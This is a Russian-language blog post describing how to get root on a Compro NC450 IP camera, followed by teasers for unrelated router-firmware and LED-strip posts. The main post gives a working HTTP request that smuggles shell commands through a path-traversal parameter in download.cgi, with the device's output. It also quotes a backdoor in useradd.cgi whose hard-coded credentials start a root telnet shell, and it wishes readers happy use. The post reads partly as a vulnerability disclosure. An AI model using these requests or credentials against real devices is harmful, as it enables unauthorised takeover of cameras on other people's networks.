Получение root на IP камере Compro NC450

-

Путем несложных действий можно получить как доступ к файловой системе IP камеры Compro NC450, так и root через Telnet.
Судя по всему, создатели камеры не сильно озаботились безопасностью устройства и оставили CGI уязвимость для нас (или для себя):
Выполнив следующий HTTP GET запрос:
"http://<camera IP>/cgi-bin/recording/download.cgi?ch=0&attach=../../../../bin/echo%20/etc/motd
в ответе мы получим Message of the day:
Content-Disposition: attachment; filename="../../../../bin/echo "your hax0red h0 h0" >> /etc/motd"
Content-Transfer-Encoding: binary

 cat: /web/html/cgi-bin/recording/save0/record0/../../../../bin/echo: No such file or directory
cat: "your: No such file or directory
cat: hax0red: No such file or directory
cat: h0: No such file or directory
cat: h0": No such file or directory
cat: >>: No such file or directory
Welcome to

     _____    __      ___       __     ___       _     _    _
   |  ___|  /  \    / __ \    /  \   |  _ \    /  \   \ \ / /
   | |___  / /\ \  | /__\ \  / /\ \  | | \ |  / /\ \   \ V /
   |  ___|| |__| | |  _   / | |__| | | | | | | |__| |   \ /
   | |    |  __  | | |  \ \ |  __  | | |_/ / |  __  |   | |
   |_|    |_|  |_| |_|   \_\|_|  |_| |___ /  |_|  |_|   |_|

 For further information check:
http://www.GM.com/
Путем несложных исследований файловой системы устройства было обнаружено, что скрипт добавления нового пользователя камеры useradd.cgi содержит бэкдор, запускающий Telnet сервер:
if [ $USERNAME = "telnet0214" ]; then
if [ $PASSWD2 = "compro0214" ]; then
/bin/busybox telnetd -l /bin/sh
echo "<script type=\"text/javascript\">"
echo " alert('Telnet started!');"
echo "  window.close();"
echo "</script>"
bCreate="no"
fi
fi
Т.е. чтобы запустить Telnet, достаточно зайти на страничку управления пользователями в WEB интерфейсе камеры и добавить пользователя с логином telnet0214 и паролем compro0214.

Удачного использования :)






Комментарии

Отправить комментарий

Популярные сообщения из этого блога

DIR-615 E4 16M Flash + 64M RAM + USB mod

-
Изображение
Наконец то пересобрал родной загрузчик DIR-615 E4 на Atheros AR7240 для поддержки флешки размером 16 МБ, а также OpenWrt с поддержкой USB. Заменил и оперативку на PSC A3S12D40ETP емкостью 64 МБ. Заработала без модификаций прошивки. Модифицированный загрузчик - ldr_16M-NOR_64M-RAM.bin Патч на загрузчик - 0001-Support-16M-SPI-NOR-flash.patch Исходники от Dlink (в них стоковые загрузчик и прошивка) - DIR615E4_GPL512.tar.gz  и тулчейн для сборки загрузчика - DIR-615E4-toolchain.bz . Они нужны только если хотите пересобрать загрузчик. Для сборки OpenWrt они не нужны. Чтобы собрать родной загрузчик: sudo tar xvfz "./DIR615E4_GPL512 (1).tar.gz" -C /home/ sudo chown *username* /home/Matrix -R sudo chmod 755 /home/Matrix -R sudo tar xvjf ./DIR-615E4-toolchain.bz -C /opt/ cd /home/Matrix/projects/DIR-615WW_E4 make profile=DIR-615WW_E4 loader Образ OpenWrt -  openwrt-ar71xx-generic-dir-615-e4-squashfs-factory.bin . Чтобы его прошить, использовал YMODEM . Патч
Далее...

Подключение своей светодиодной ленты к Xiaomi Yeelight LED Smart Light Strip (YLDD03YL)

-
Изображение
При сборке светодиодного освещения для кухни захотелось подключить его уже к имеющейся системе домашней автоматизации на базе Xiaomi MI Multifunction Gateway. Проглядев ассортимент светодиодных лент и контроллеров Xiaomi обнаружил, что для моих целей по функциональности подходит комплект Xiaomi Yeelight LED Smart light strip (YLDD03YL), но сама светодиодная лента, которая идет в комплекте, не становится в уже имеющиеся крепления на кухонных шкафчиках т.к. достаточно массивна. Кроме того уже была куплена лента на 12 Вольт  на белых светодиодах 5050 (EStar ES-FS5050W72), поэтому было принято решение попытаться подключить имеющуюся ленту к блоку управления Yeelight. + Блок управления светодиодной лентой Xiaomi Yeelight LED Smart Light Strip (YLDD03YL) позволяет управлять нагрузкой мощностью до 120 Ватт и имеет 2 канала управления, которые в оригинальной ленте используются для изменения температуры свечения. В характеристиках блока управления нигде не указаны его выходн
Далее...

Прошивка OpenWrt из загрузчика по YMODEM

-
Изображение
Поскольку иногда при перепрошивке роутера возникают проблемы с TFTP, то приходится вспоминать хорошо забытое старое. Исчерпывающий мануал на английском можно почитать здесь . Протокол YMODEM   предназначен для передачи файлов между устройствами по последовательному порту в процессе терминальной сессии. Т.е. чтобы загрузить образ Linux в устройство, необходимо лишь подключение к его консоли. Для отправки файла необходима любая программа, поддерживающая данный протокол, например HyperTerminal под Windows, либо Minicom из Linux. Для перепрошивки DIR-615 выполняем следующее: 1. Подключаемся к консоли устройства через  HyperTerminal 2. Включаем роутер и Enter до появления " ar7240>   " 3. Вводим команду " loady "  4. В меню HyperTerminal выбираем " Transfer "->" Send File ". Выбираем образ OpenWrt, " Protocol" -> " Y-Modem ". И нажимаем "Send". Если пользуемся Minicom, то нажимаем Ctrl-A,
Далее...